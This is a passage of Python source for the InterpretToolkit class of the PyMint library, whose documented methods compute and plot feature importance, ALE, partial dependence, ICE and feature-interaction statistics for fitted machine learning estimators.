save_dataframe,
combine_top_features,
determine_feature_dtype,
is_str,
is_list,
is_dataset,
is_dataframe,
)
class InterpretToolkit(Attributes):
"""
InterpretToolkit is the primary interface of PyMint. The modules contained within compute several
interpretable machine learning (IML) methods such as
Feature importance:
* `permutation_importance`
* `ale_variance`
Feature Attributions:
- `ale`
- `pd`
- `ice`
- `shap`
- `local_contributions`
Feature Interactions:
- `interaction_strength`
- `ale_variance`
- `perm_based_interaction`
- `friedman_h_stat`
- `main_effect_complexity`
- `ale`
- `pd`
Additionally, there are corresponding plotting modules for
each IML method, which are designed to produce publication-quality graphics.
.. note::
InterpretToolkit is designed to work with estimators that implement predict or predict_proba.
.. caution::
InterpretToolkit is only designed to work with binary classification and regression problems.
In future versions of PyMint, we hope to be compatiable with multi-class classification.
Parameters
-----------
estimators : list of tuples of (estimator name, fitted estimator)
Tuple of (estimator name, fitted estimator object) or list thereof where the
fitted estimator must implement ``predict`` or ``predict_proba``.
Multioutput-multiclass classifiers are not supported.
X : {array-like or dataframe} of shape (n_samples, n_features)
Training or validation data used to compute the IML methods.
If ndnumpy.array, must specify `feature_names`.
y : {list or numpy.array} of shape (n_samples,)
The target values (class labels in classification, real numbers in regression).
estimator_output : ``"raw"`` or ``"probability"``
What output of the estimator should be explained. Determined internally by
InterpretToolkit. However, if using a classification model, the user
can set to "raw" for non-probabilistic output.
feature_names : array-like of shape (n_features,), dtype=str, default=None
Name of each feature; ``feature_names[i]`` holds the name of the feature
with index ``i``. By default, the name of the feature corresponds to their numerical
index for NumPy array and their column name for pandas dataframe.
Feature names are only required if ``X`` is an ndnumpy.array, a it will be
converted to a pandas.DataFrame internally.
Raises
---------
AssertError
Number of estimator objects is not equal to the number of estimator names given!
TypeError
y variable must be numpy array or pandas.DataFrame.
Exception
Feature names must be specified if X is an numpy.array.
ValueError
estimator_output is not an accepted option.
"""
def __init__(self, estimators=None,
X=pd.DataFrame(np.array([])),
y=np.array([]),
estimator_output=None,
feature_names=None):
if estimators is not None:
if not is_list(estimators) and estimators:
estimators = [estimators]
estimator_names = [e[0] for e in estimators]
estimators = [e[1] for e in estimators]
else:
estimator_names = None
self.set_estimator_attribute(estimators, estimator_names)
self.set_y_attribute(y)
self.set_X_attribute(X, feature_names)
self.set_estimator_output(estimator_output, estimators)
self.checked_attributes = True
# Initialize a global interpret object
self.global_obj = GlobalInterpret(estimators=self.estimators,
estimator_names=self.estimator_names,
X=self.X,
y =self.y,
estimator_output=self.estimator_output,
checked_attributes=self.checked_attributes)
# Initialize a local interpret object
self.local_obj = LocalInterpret(estimators=self.estimators,
estimator_names=self.estimator_names,
X=self.X,
y=self.y,
estimator_output=self.estimator_output,
checked_attributes=self.checked_attributes
)
self.attrs_dict = {
'estimator_output' : self.estimator_output,
'estimators used' : self.estimator_names
}
    def __repr__(self):
        # Debug summary of the toolkit configuration.  The estimator objects
        # themselves are interpolated, so this can be verbose for large models.
        return 'InterpretToolkit(estimator=%s \n \
                 estimator_names=%s \n \
                 X=%s length:%d \n \
                 y=%s length:%d \n \
                 estimator_output=%s \n \
                 feature_names=%s length %d)' % \
                 (self.estimators,
                 self.estimator_names,
                 type(self.X), len(self.X),
                 type(self.y), len(self.y),
                 self.estimator_output,
                 type(self.feature_names), len(self.feature_names))
def _append_attributes(self,ds):
"""
FOR INTERNAL PURPOSES ONLY.
Append attributes to a xarray.Dataset or pandas.DataFrame
Parameters
----------
ds : xarray.Dataset or pandas.DataFrame
Results data from the IML methods
"""
for key in self.attrs_dict.keys():
ds.attrs[key] = self.attrs_dict[key]
return ds
def permutation_importance(self, n_vars, evaluation_fn, direction='backward',
subsample=1.0, n_jobs=1, n_bootstrap=None, scoring_strategy=None, verbose=False, random_state=None,
return_iterations=False,
):
"""
Performs single-pass and/or multi-pass permutation importance using a modified version of the
PermutationImportance package (pymint.PermutationImportance) [1]_. The single-pass approach was first
developed in Brieman (2001) [2]_ and then improved upon in Lakshmanan et al. (2015) [3]_.
.. attention ::
The permutation importance rankings can be sensitive to the evaluation function used.
Consider re-computing with multiple evaluation functions.
.. attention ::
The permutation importance rankings can be sensitive to the direction used.
Consider re-computing with both forward- and backward-based methods.
.. hint ::
Since the permutation importance is a marginal-based method, you can often use
subsample << 1.0 without substantially altering the feature rankings.
Using a subsample << 1.0 can reduce the computation time for larger datasets (e.g., >100 K X),
especially since 100-1000s of bootstrap iterations are often required for reliable rankings.
Parameters
----------
n_vars : integer
number of variables to calculate the multipass permutation importance for. If ``n_vars=1``, then
only the single-pass permutation importance is computed. If ``n_vars>1``, both the single-pass
and multiple-pass are computed.
evaluation_fn : string or callable
evaluation/scoring function for evaluating the loss of skill once a feature is permuted.
evaluation_fn can be set to one of the following strings:
- ``"auc"``, Area under the Curve
- ``"auprc"``, Area under the Precision-Recall Curve
- ``"bss"``, Brier Skill Score
- ``"mse"``, Mean Square Error
- ``"norm_aupdc"``, Normalized Area under the Performance Diagram (Precision-Recall) Curve
Otherwise, evaluation_fn can be any function of form,
`evaluation_fn(targets, predictions)` and must return a scalar value
When using a custom function, you must also set the scoring strategy (see below).
scoring_strategy : string (default=None)
This argument is only required if you are using a non-default evaluation_fn (see above)
If the evaluation_fn is positively-oriented (a higher value is better),
then set ``scoring_strategy = "argmin_of_mean"`` and if it is negatively-oriented-
(a lower value is better), then set ``scoring_strategy = "argmax_of_mean"``
direction : ``"forward"`` or ``"backward"``
For the multi-pass method. For ``"backward"``, the top feature is left permuted before determining
the second-most important feature (and so on). For ``"forward"``, all features are permuted
and then the top features are progressively left unpermuted. For real-world datasets, the two
methods often do not produce the same feature rankings and is worth exploring both.
subsample: float or integer (default=1.0 for no subsampling)
if value is between 0-1, it is interpreted as fraction of total X to use
if value > 1, interpreted as the number of X to randomly sample
from the original dataset.
n_jobs : interger or float (default=1; no multiprocessing)
if integer, interpreted as the number of processors to use for multiprocessing
if float between 0-1, interpreted as the fraction of proceesors to use for multiprocessing
n_bootstrap: integer (default=None for no bootstrapping)
Number of bootstrap iterations for computing confidence intervals on the feature rankings.
random_state : int, RandomState instance, default=None
Pseudo-random number generator to control the permutations of each
feature. Pass an int to get reproducible results across function calls.
verbose : boolean
True for print statements on the progress
Returns
--------
results : xarray.DataSet
Permutation importance results. Includes the both multi-pass and single-pass
feature rankings and the scores with the various features permuted.
References
-----------
.. [1] https://github.com/gelijergensen/PermutationImportance
.. [2] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
.. [3] Lakshmanan, V., C. Karstens, J. Krause, K. Elmore, A. Ryzhkov, and S. Berkseth, 2015:
Which Polarimetric Variables Are Important for Weather/No-Weather Discrimination?
Journal of Atmospheric and Oceanic Technology, 32, 1209–1223,
https://doi.org/10.1175/jtech-d-13-00205.1.
Examples
----------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> # Only compute for the first model
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs[0],
... estimator_names=estimator_names[0],
... X=X,
... y=y,
... )
>>> perm_imp_results = explainer.permutation_importance(
... n_vars=10,
... evaluation_fn = 'norm_aupdc',
... subsample=0.5,
... n_bootstrap=20,
... )
>>> print(perm_imp_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 20, n_vars_multipass: 10, n_vars_singlepass: 30)
Dimensions without coordinates: n_bootstrap, n_vars_multipass, n_vars_singlepass
Data variables:
multipass_rankings__Random Forest (n_vars_multipass) <U17 'sfc_te...
multipass_scores__Random Forest (n_vars_multipass, n_bootstrap) float64 ...
singlepass_rankings__Random Forest (n_vars_singlepass) <U17 'sfc_t...
singlepass_scores__Random Forest (n_vars_singlepass, n_bootstrap) float64 ...
original_score__Random Forest (n_bootstrap) float64 0.9851 .....
Attributes:
estimator_output: probability
estimators used: ['Random Forest']
n_multipass_vars: 10
method: permutation_importance
direction: backward
evaluation_fn: norm_aupdc
"""
results_ds = self.global_obj.calc_permutation_importance(n_vars=n_vars,
evaluation_fn=evaluation_fn,
subsample=subsample,
n_jobs=n_jobs,
n_bootstrap=n_bootstrap,
scoring_strategy=scoring_strategy,
verbose=verbose,
direction=direction,
random_state=random_state,
return_iterations=return_iterations,
)
self.attrs_dict['n_multipass_vars'] = n_vars
self.attrs_dict['method'] = 'permutation_importance'
self.attrs_dict['direction'] = direction
self.attrs_dict['evaluation_fn'] = evaluation_fn
results_ds = self._append_attributes(results_ds)
return results_ds
def ale_variance(self,
ale,
features=None,
estimator_names=None,
interaction=False,
):
"""
Compute the standard deviation (std) of the ALE values for each
features in a dataset and then rank by the magnitude. A higher std(ALE) indicates a
greater expected contribution to an estimator's prediction and is thus considered more important.
If ``interaction=True``, then the method computes a similar method for the
2D ALE to measure the feature interaction strength.
This method is inspired by the feature importance and interaction
methods developed in Greenwell et al. (2018) [4]_.
Parameters
----------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale` for
``features``.
features : 'all', string, list of strings, list of 2-tuples
Features to compute the ALE variance for. If set to ``'all'``, it is
computed for all features. If ``interaction=True``, then features
must be a list of 2-tuples for computing the interaction between
the set of feature combinations.
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the ALE variance for.
interaction : boolean
- If True, it computes the feature interaction strength
- If False, compute the feature importance
Returns
--------
results_ds : xarray.Dataset
ALE variance results. Includes both the rankings and scores.
References
-------------
.. [4] Greenwell, B. M., B. C. Boehmke, and A. J. McCarthy, 2018:
A Simple and Effective estimator-Based Variable Importance Measure. Arxiv,.
Examples
-----------
>>> import pymint
>>> import itertools
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all', n_bins=10, subsample=1000, n_bootstrap=1)
>>> # Compute 1D ALE variance
>>> ale_var_results = explainer.ale_variance(ale)
>>> print(ale_var_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 1, n_vars_ale_variance: 30)
Dimensions without coordinates: n_bootstrap, n_vars_ale_variance
Data variables:
ale_variance_rankings__Random Forest (n_vars_ale_variance) <U17 'r...
ale_variance_scores__Random Forest (n_vars_ale_variance, n_bootstrap) float64 ...
ale_variance_rankings__Gradient Boosting (n_vars_ale_variance) <U17 'u...
ale_variance_scores__Gradient Boosting (n_vars_ale_variance, n_bootstrap) float64 ...
ale_variance_rankings__Logistic Regression (n_vars_ale_variance) <U17 'r...
ale_variance_scores__Logistic Regression (n_vars_ale_variance, n_bootstrap) float64 ...
Attribute:
estimator_output: probability
estimators used: ['Random Forest', 'Gradient Boosting', 'Logistic Regre...
n_multipass_vars: 5
method: ale_variance
direction: backward
evaluation_fn: sigma_ale
dimension: 1D
features used: ['dllwave_flux', 'dwpt2m', 'fric_vel', 'gflux', 'high_...
estimator output: probability
interaction: False
>>> #Typical, we only want to evaluate the feature interactions for
>>> # the most important features
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez', 'tmp2m_hrs_bl_frez',
... 'uplwav_flux']
>>> # Create all possible combinations
>>> important_vars_2d = list(itertools.combinations(important_vars, r=2))
>>> #For the 2D ALE variance to measure feature interaction strength
>>> ale_2d = explainer.ale(features=important_vars_2d, n_bins=10,
... subsample=1000, n_bootstrap=1)
>>> # Compute 2D ALE variance
>>> ale_var_results = explainer.ale_variance(ale_2d, features=important_vars_2d,
... interaction=True)
>>> print(ale_var_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 1, n_vars_ale_variance_interactions: 10)
Dimensions without coordinates: n_bootstrap, n_vars_ale_variance_interactions
Data variables:
ale_variance_interactions_rankings__Random Forest (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Random Forest (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
ale_variance_interactions_rankings__Gradient Boosting (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Gradient Boosting (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
ale_variance_interactions_rankings__Logistic Regression (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Logistic Regression (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
Attribute:
estimator_output: probability
estimators used: ['Random Forest', 'Gradient Boosting', 'Logistic Regre...
n_multipass_vars: 5
method: ale_variance
direction: backward
evaluation_fn: Interaction Importance
dimension: 2D
features used: [('sfc_temp', 'temp2m'), ('sfc_temp', 'sfcT_hrs_bl_fre...
estimator output: probability
interaction: True
"""
if (features == 'all' or features is None) and interaction:
features = list(itertools.combinations(self.feature_names, r=2))
if estimator_names is None:
estimator_names = self.estimator_names
if is_str(estimator_names):
estimator_names = [estimator_names]
if interaction:
if ale.attrs['dimension'] != '2D':
raise Expection("ale must be compute for second-order ALE if interaction == True")
# Check that ale_data is an xarray.Dataset
if not isinstance(ale, xr.core.dataset.Dataset):
raise ValueError("""
ale must be an xarray.Dataset,
perferably generated by InterpretToolkit.ale
to be formatted correctly
""")
else:
any_missing = all([m in ale.attrs['estimators used'] for m in estimator_names])
if not any_missing:
raise ValueError('ale does not contain values for all the estimator names given!')
if interaction:
func = self.global_obj.compute_interaction_rankings
else:
func = self.global_obj.compute_ale_variance
results_ds = func(data=ale, estimator_names=estimator_names, features=features,)
self.attrs_dict['method'] = 'ale_variance'
self.attrs_dict['estimators used'] = estimator_names
self.attrs_dict['estimator output'] = 'probability'
self.attrs_dict['interaction'] = str(interaction)
if interaction:
self.attrs_dict['evaluation_fn'] = 'Interaction Importance'
else:
self.attrs_dict['evaluation_fn'] = 'sigma_ale' #'$\sigma$(ALE)'
results_ds = self._append_attributes(results_ds)
return results_ds
def main_effect_complexity(self, ale, estimator_names=None,
max_segments=10, approx_error=0.05):
"""
Compute the Main Effect Complexity (MEC; Molnar et al. 2019) [5]_.
MEC is the number of linear segements required to approximate
the first-order ALE curves averaged over all features.
The MEC is weighted-averged by the variance. Higher values indicate
a more complex estimator (less interpretable).
References
-----------
.. [5] Molnar, C., G. Casalicchio, and B. Bischl, 2019: Quantifying estimator Complexity via
Functional Decomposition for Better Post-Hoc Interpretability. ArXiv.
Parameters
----------------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale`. Must be computed for all features in X.
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the MEC for.
max_segments : integer; default=10
Maximum number of linear segments used to approximate the main/first-order
effect of a feature. default is 10. Used to limit the computational runtime.
approx_error : float; default=0.05
The accepted error of the R squared between the piece-wise linear function
and the true ALE curve. If the R square is within the approx_error, then
no additional segments are added.
Returns
---------
mec_dict : dictionary
mec_dict = {estimator_name0 : mec0, estimator_name1 : mec2, ..., estimator_nameN : mecN,}
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all', n_bins=20, subsample=0.5, n_bootstrap=20)
>>> # Compute Main Effect Complexity (MEC)
>>> mec_ds = explainer.main_effect_complexity(ale)
>>> print(mes_ds)
{'Random Forest': 2.6792782503392756,
'Gradient Boosting': 2.692392706080586,
'Logistic Regression': 1.6338281469152958}
"""
if estimator_names is None:
estimator_names=self.estimator_names
else:
if is_str(estimator_names):
estimator_names=[estimator_names]
mec_dict = {}
for estimator_name in estimator_names:
mec, _ = self.global_obj.compute_main_effect_complexity(
estimator_name=estimator_name,
ale_ds=ale,
features=self.feature_names,
max_segments=max_segments,
approx_error=approx_error
)
mec_dict[estimator_name] = mec
return mec_dict
def perm_based_interaction(self, features, evaluation_fn,
estimator_names=None, n_jobs=1, subsample=1.0,
n_bootstrap=1, verbose=False):
"""
Compute the performance-based feature interactions from Oh (2019) [6]_.
For a pair of features, the loss of skill is recorded for permuting
each feature separately and permuting both. If there is no feature interaction
and the covariance between the two features is close to zero, the sum of the
individual losses will approximately equal the loss of skill from permuting
both features. Otherwise, a non-zero difference indicates some interaction.
The differences for different pairs of features can be used to rank the
strength of any feature interactions.
References
-------------
.. [6] Oh, Sejong, 2019. Feature Interaction in Terms of Prediction Performance
https://www.mdpi.com/2076-3417/9/23/5191
Parameters
-----------
features : list of 2-tuple of strings
Pairs of features to compute the interaction strength for.
evaluation_fn : string or callable
evaluation/scoring function for evaluating the loss of skill once a feature is permuted.
evaluation_fn can be set to one of the following strings:
- ``"auc"``, Area under the Curve
- ``"auprc"``, Area under the Precision-Recall Curve
- ``"bss"``, Brier Skill Score
- ``"mse"``, Mean Square Error
- ``"norm_aupdc"``, Normalized Area under the Performance Diagram (Precision-Recall) Curve
Otherwise, evaluation_fn can be any function of form,
`evaluation_fn(targets, predictions)` and must return a scalar value
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute for.
subsample: float or integer (default=1.0 for no subsampling)
- if value is between 0-1, it is interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_jobs : interger or float (default=1; no multiprocessing)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float between 0-1, interpreted as the fraction of proceesors to use for multiprocessing
n_bootstrap: integer (default=None for no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the feature pair rankings.
Returns
---------
results_ds : xarray.Dataset
Permutation importance-based feature interaction strength results
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez', 'tmp2m_hrs_bl_frez',
... 'uplwav_flux']
>>> important_vars_2d = list(itertools.combinations(important_vars, r=2))
>>> perm_based_interact_ds = explainer.perm_based_interaction(
... important_vars_2d, evaluation_fn='norm_aupdc',
... )
"""
if estimator_names is None:
estimator_names=self.estimator_names
else:
if is_str(estimator_names):
estimator_names=[estimator_names]
results_ds = self.global_obj.compute_interaction_rankings_performance_based(
estimator_names,
features,
evaluation_fn=evaluation_fn,
estimator_output=self.estimator_output,
subsample=subsample,
n_bootstrap=n_bootstrap,
n_jobs=n_jobs,
verbose=verbose)
self.attrs_dict['method'] = 'perm_based'
self.attrs_dict['estimators used'] = estimator_names
self.attrs_dict['estimator output'] = self.estimator_output
self.attrs_dict['evaluation_fn'] = 'Interaction Importance'
results_ds = self._append_attributes(results_ds)
return results_ds
def ice(self, features, n_bins=30, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Compute the indiviudal conditional expectations (ICE) [7]_.
References
------------
.. [7] https://christophm.github.io/interpretable-ml-book/ice.html
Parameters
-----------
features : string or list of strings or 'all'
Features to compute the ICE for. if 'all', the method will compute
the ICE for all features.
n_bins : integer (default=30)
Number of bins used to compute the ICE for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the ICE curves.
Returns
---------
results : xarray.DataSet
Main keys are the user-provided estimator names while the sub-key
are the features computed for. The items are data for the ICE curves. Also,
contains X data (feature values where the ICE curves were computed) for plotting.
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ice_ds = explainer.ice(features='all', subsample=200)
"""
if is_str(features):
if features == 'all':
features = self.feature_names
results_ds = self.global_obj._run_interpret_curves(method="ice",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance(list(features)[0], tuple) else '1D'
self.attrs_dict['method'] = 'ice'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.feature_used=features
return results_ds
def pd(self, features, n_bins=25, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Computes the 1D or 2D centered partial dependence (PD) [8]_.
References
------------
.. [8] https://christophm.github.io/interpretable-ml-book/pdp.html
Parameters
----------
features : string or list of strings or 'all'
Features to compute the PD for. if 'all', the method will compute
the PD for all features.
n_bins : integer (default=30)
Number of bins used to compute the PD for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the PD curves.
Returns
--------
results : xarray.DataSet
Partial dependence result dataset
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd = explainer.pd(features='all')
"""
if is_str(features):
if features == 'all':
features = self.feature_names
if features == 'all_2d':
features = list(itertools.combinations(self.feature_names, r=2))
results_ds = self.global_obj._run_interpret_curves(method="pd",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance( list(features)[0] , tuple) else '1D'
self.attrs_dict['method'] = 'pd'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.features_used = features
return results_ds
def ale(self, features=None, n_bins=30, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Compute the 1D or 2D centered accumulated local effects (ALE) [9]_ [10]_.
For categorical features, simply set the type of those features in the
dataframe as ``category`` and the categorical ALE will be computed.
References
-----------
.. [9] https://christophm.github.io/interpretable-ml-book/ale.html
.. [10] Apley, D. W., and J. Zhu, 2016: Visualizing the Effects of Predictor Variables in
Black Box Supervised Learning Models. ArXiv.
Parameters
----------
features : string or list of strings or 'all'
Features to compute the PD for. if 'all', the method will compute
the ALE for all features.
n_bins : integer (default=30)
Number of bins used to compute the ALE for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the ALE curves.
Returns
----------
results : xarray.DataSet
ALE result dataset
Raise
----------
Exception
Highly skewed data may not be divisable into n_bins given. In that case, calc_ale
uses the max bins the data can be divided into. But a warning message is raised.
Examples
---------
>>> import pymint
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
>>> X, y = pymint.load_data() # training data
>>> # Set the type for categorical features and InterpretToolkit with compute the
>>> # categorical ALE.
>>> X = X.astype({'urban': 'category', 'rural':'category'})
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
"""
if is_str(features):
if features == 'all':
features = self.feature_names
if features == 'all_2d':
features = list(itertools.combinations(self.feature_names, r=2))
results_ds = self.global_obj._run_interpret_curves(method="ale",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance( list(features)[0] , tuple) else '1D'
self.attrs_dict['method'] = 'ale'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.features_used = features
return results_ds
def friedman_h_stat(self, pd_1d, pd_2d, features, estimator_names=None, **kwargs):
"""
Compute the second-order Friedman's H-statistic for computing feature interactions [11]_ [12]_.
Based on equation (44) from Friedman and Popescu (2008) [12]_. Only computes the interaction strength
between two features. In future versions of PyMint we hope to include the first-order H-statistics
that measure the interaction between a single feature and the
remaining set of features.
References
-----------
.. [11] https://christophm.github.io/interpretable-ml-book/interaction.html
.. [12] Friedman, J. H., and B. E. Popescu, 2008: Predictive learning via rule ensembles.
Ann Appl Statistics, 2, 916–954, https://doi.org/10.1214/07-aoas148.
Parameters
-----------
pd_1d : xarray.Dataset
1D partial dependence dataset. Results of :func:`~InterpretToolkit.pd` for ``features``
pd_2d : xarray.Dataset
2D partial dependence dataset. Results of :func:`~InterpretToolkit.pd`, but 2-tuple combinations
of ``features``.
features : list of 2-tuples of strings
The pairs of features to compute the feature interaction between.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the H-statistic for.
Returns
----------
results_ds : xarray.Dataset
The second-order Friedman H-statistic for all estimators.
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd_1d = explainer.pd(features='all')
>>> pd_2d = explainer.pd(features='all_2d')
>>> hstat = explainer.friedman_h_stat(pd_1d, pd_2d,)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
results_ds = self.global_obj.compute_scalar_interaction_stats(
method = 'hstat',
data=pd_1d,
data_2d = pd_2d,
features=features,
estimator_names=estimator_names,
**kwargs,
)
results_ds = self._append_attributes(results_ds)
return results_ds
def interaction_strength(self, ale, estimator_names=None, **kwargs):
"""
Compute the InterAction Strength (IAS) statistic from Molnar et al. (2019) [5]_.
The IAS varies between 0-1 where values closer to 0 indicate no feature interaction
strength.
Parameters
------------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale`, but must be computed for all features
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the IAS for.
kwargs : dict
- subsample
- n_bootstrap
- estimator_output
Returns
----------
results_ds : xarray.Dataset
Interaction strength result dataset
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
>>> ias = explainer.interaction_strength(ale)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
# Check that ale_data is an xarray.Dataset
if not isinstance(ale, xr.core.dataset.Dataset):
raise ValueError("""
ale must be an xarray.Dataset,
perferably generated by mintpy.InterpretToolkit.calc_ale to be formatted correctly
"""
)
else:
any_missing = all([m in ale.attrs['estimators used'] for m in estimator_names])
if not any_missing:
raise ValueError(f'ale does not contain data for all the estimator names given!')
kwargs['estimator_output'] = self.estimator_output
results_ds = self.global_obj.compute_scalar_interaction_stats(
method = 'ias',
data=ale,
estimator_names=estimator_names,
**kwargs,
)
results_ds = self._append_attributes(results_ds)
return results_ds
def _plot_interpret_curves(self, method, data, estimator_names, features=None,
display_feature_names={}, display_units={},
to_probability=False, **kwargs):
"""
FOR INTERNAL USE ONLY.
Handles 1D or 2D PD/ALE plots.
"""
if features is None:
try:
features = self.features_used
except:
raise ValueError('No features were provided to plot!')
else:
if is_str(features):
features=[features]
if data.attrs['dimension'] == '2D':
plot_obj = PlotInterpret2D()
return plot_obj.plot_contours(method=method,
data=data,
estimator_names=estimator_names,
features=features,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability = to_probability,
**kwargs)
else:
base_font_size = 12 if len(features) <= 6 else 16
base_font_size = kwargs.get('base_font_size', base_font_size)
plot_obj = PlotInterpretCurves(BASE_FONT_SIZE=base_font_size)
return plot_obj.plot_1d_curve(method=method,
data=data,
estimator_names=estimator_names,
features=features,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability = to_probability,
**kwargs)
def plot_pd(self, pd=None, features=None, estimator_names=None,
display_feature_names={}, display_units={},
line_colors=None, to_probability=False, **kwargs):
"""
Runs the 1D and 2D partial dependence plotting.
Parameters
----------
pd : xarray.Dataset
Results of :func:`~InterpretToolkit.pd` for
``features``.
features : string, list of strings, list of 2-tuple of strings
Features to plot the PD for. To plot for 2D PD,
pass a list of 2-tuples of features.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to plot for.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., ``display_feature_names = { 'dwpt2m' : '$T_{d}$', }``
The plotting code can handle latex-style formatting.
display_units : dict
For plotting purposes. Dictionary that maps the feature names
to their units.
E.g., ``display_units = { 'dwpt2m' : '$^\circ$C', }``
line_colors : str or list of strs of len(estimators)
User-defined colors for curve plotting.
to_probability : boolean
If True, the values are multipled by 100.
Keyword arguments include arguments typically used for matplotlib.
Returns
--------
fig, axes: matplotlib figure instance and the corresponding axes
Examples
---------
>>> import pymint
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
